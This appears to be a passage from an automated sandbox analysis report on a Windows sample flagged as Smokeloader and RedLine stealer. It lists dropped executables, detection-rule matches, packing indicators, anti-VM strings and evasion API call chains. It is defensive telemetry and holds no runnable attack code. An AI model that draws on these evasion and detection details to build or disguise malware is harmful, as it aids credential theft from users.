                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009F39AC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009F6936
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A07A7D
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009EEC00
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A07D27
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009F8D36
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A07FEE
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A16F46
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: String function: 009F09A7 appears 52 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: String function: 00410740 appears 52 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: String function: 0040F928 appears 36 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: String function: 0040FDD7 appears 123 times
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: String function: 009F003E appears 119 times
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7404 -s 1132
                    Source: jicQJ2cdlM.exe | Binary or memory string: OriginalFileName vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exe, 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exe, 00000000.00000003.1746264050.0000000000A50000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exe, 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs jicQJ2cdlM.exe
                    Source: jicQJ2cdlM.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.4174565055.00000000007F9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000001.00000002.2054499794.0000000002E09000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: jicQJ2cdlM.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: A8A9.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@1/3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007FA24E CreateToolhelp32Snapshot,Module32First
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Mutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7404
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | File created: C:\Users\user\AppData\Local\Temp\A8A9.tmp
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | File read: C:\Users\user\Desktop\desktop.ini
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: jicQJ2cdlM.exe | ReversingLabs: Detection: 31%
                    Source: unknown | Process created: C:\Users\user\Desktop\jicQJ2cdlM.exe "C:\Users\user\Desktop\jicQJ2cdlM.exe"
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Process created: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe "C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe"
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: msimg32.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: msvcr100.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: dpapi.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: gpapi.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: propsys.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: edputil.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: wintypes.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: appresolver.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: bcp47langs.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: slc.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: sppc.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: pcacli.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: mpr.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Section loaded: sfc_os.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: msvcr100.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Unpacked PE file: 1.2.A8A9.tmp.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.weririt:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Unpacked PE file: 0.2.jicQJ2cdlM.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Unpacked PE file: 1.2.A8A9.tmp.exe.400000.1.unpack
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .weririt
                    Source: A8A9.tmp.exe.0.dr | Static PE information: section name: .weririt
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00410786 push ecx; ret 0_2_00410799
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_0043DB97 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB9B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007FB09B push es; iretd 0_2_007FB0AC
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007FF46F pushad ; ret 0_2_007FF48B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007FB576 push E8665AC8h; iretd 0_2_007FB57B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007FF5ED push ecx; ret 0_2_007FF60A
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007FDB31 push FFFFFFADh; ret 0_2_007FDBA3
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_007FCE64 push 00000003h; ret 0_2_007FCE68
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009F0018 push ecx; ret 0_2_009F002B
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A179BF push esp; retf 0_2_00A179C7
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_009F09ED push ecx; ret 0_2_009F0A00
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A19E08 pushad ; retf 0_2_00A19E0F
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_00A17FBD push esp; retf 0_2_00A17FBE
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0041B035 push ecx; ret 1_2_0041B048
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_0040020D pushfd ; iretd 1_2_00400211
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D2B29C push ecx; ret 1_2_02D2B2AF
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02D10F59 pushfd ; iretd 1_2_02D11078
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02E0B7EB push 7DD07DC0h; iretd 1_2_02E0B7FC
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02E0E7CA push eax; ret 1_2_02E0E7D9
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02E0E7BB push eax; ret 1_2_02E0E7D9
                    Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe | Code function: 1_2_02E0ACE5 pushfd ; iretd 1_2_02E0ACE8
                    Source: jicQJ2cdlM.exe | Static PE information: section name: .text entropy: 7.652676977218571
                    Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.4826108141905285
                    Source: A8A9.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.4826108141905285
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | File created: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Code function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\jicQJ2cdlM.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Evasive API call chain: GetUserDefaultLangID, ExitProcess (graph_1-26313)
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Window / User API: threadDelayed 359
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Window / User API: threadDelayed 9631
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Evaded block: after key decision (graph_1-27474)
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-64166)
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; API coverage: 5.1 %
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; API coverage: 6.5 %
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388; Thread sleep count: 359 > 30
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388; Thread sleep time: -255249s >= -30000s
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388; Thread sleep count: 9631 > 30
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe TID: 7388; Thread sleep time: -6847641s >= -30000s
Source: C:\Users\user\Desktop\jicQJ2cdlM.exe; Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D1E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D1EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D24B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D23B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D1C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D1DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D1E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D1F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D24107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_02D11937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\A8A9.tmp.exe; Code function: 1_2_00401160 GetSystemInfo,ExitProcess
Source: jicQJ2cdlM.exe, 00000000.00000003.4048093961.0000000000886000.00000004.00000020.00020000.00000000.sdmp, jicQJ2cdlM.exe, 00000000.00000002.4174618385.0000000000886000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW5
Source: Amcache.hve.4.dr; Binary or memory string: VMware
Source: A8A9.tmp.exe, 00000001.00000002.2054517436.0000000002E33000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: VMwareVMwareF
Source: Amcache.hve.4.dr; Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.4.dr; Binary or memory string: vmci.syshbin
Source: Amcache.hve.4.dr; Binary or memory string: VMware, Inc.
Source: Amcache.hve.4.dr; Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.4.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
